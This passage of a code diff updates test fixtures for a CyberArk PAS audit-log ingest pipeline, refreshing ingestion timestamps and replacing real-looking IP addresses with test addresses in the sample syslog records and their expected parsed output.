Connection\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"34.71.250.247\"}}}", + "ingested": "2021-12-09T13:36:39.546327300Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json index 1847a535269..ed45fb133ef 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json @@ -49,7 +49,7 @@ "event": { "severity": 2, "action": "partial gateway connection", - "ingested": "2021-06-09T10:24:29.253603900Z", + "ingested": "2021-12-09T13:36:40.675511Z", "original": "\u003c5\u003e1 2021-03-25T09:20:07Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e20\u003c/MessageID\u003e\\n \u003cDesc\u003ePartial Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMGw_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePartial Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePartial Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 05:20:07\",\"IsoTimestamp\":\"2021-03-25T09:20:07Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"20\",\"Desc\":\"Partial Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_COMP01\",\"Action\":\"Partial Gateway Connection\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Partial Gateway Connection\",\"GatewayStation\":\"\"}}}", "code": "20", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json index 719901aa51e..f91eafda9e4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "old backup files deletion start", - "ingested": "2021-06-09T10:24:29.286781700Z", + "ingested": "2021-12-09T13:36:40.797519200Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"202\",\"Desc\":\"Old Backup Files Deletion Start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion Start\",\"GatewayStation\":\"\"}}}", "code": "202", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json index 377d88abad4..e7b1f09d867 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "old backup files deletion end", - "ingested": "2021-06-09T10:24:29.314784200Z", + "ingested": "2021-12-09T13:36:40.949257400Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"203\",\"Desc\":\"Old Backup Files Deletion End\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion End\",\"GatewayStation\":\"\"}}}", "code": "203", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log index f3949f536de..fe6a126c6cb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log @@ -1,2 +1,2 @@ Apr 07 09:51:42 VAULT {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\n 10.2.0.4\n \n \n \n ImmediateTask\n address=radiussrv.cyberark.local;username=test12;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","IsoTimestamp":"2021-03-16T15:01:00Z","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12","Station":"10.2.0.4","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=radiussrv.cyberark.local;username=test12;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"test12"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastSuccessVerification","Value":"1604943844"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"}]}}}} -<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=34.123.103.115;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=67.43.156.15;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json index 84719630fd3..ffafb7bd4ff 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json @@ -79,7 +79,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.336761500Z", + "ingested": "2021-12-09T13:36:41.072867800Z", "original": "Apr 07 09:51:42 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"}]}}}}", "code": "22", "kind": "event", @@ -104,20 +104,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -140,7 +131,7 @@ }, "@timestamp": "2021-03-15T10:22:44.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -152,7 +143,7 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { @@ -160,19 +151,19 @@ "severity": "Info", "reason": "ImmediateTask", "iso_timestamp": "2021-03-15T10:22:44Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e22\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e22\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -182,7 +173,7 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password", @@ -195,8 +186,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.336778300Z", - "original": "\u003c5\u003e1 2021-03-15T10:22:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:44\",\"IsoTimestamp\":\"2021-03-15T10:22:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify 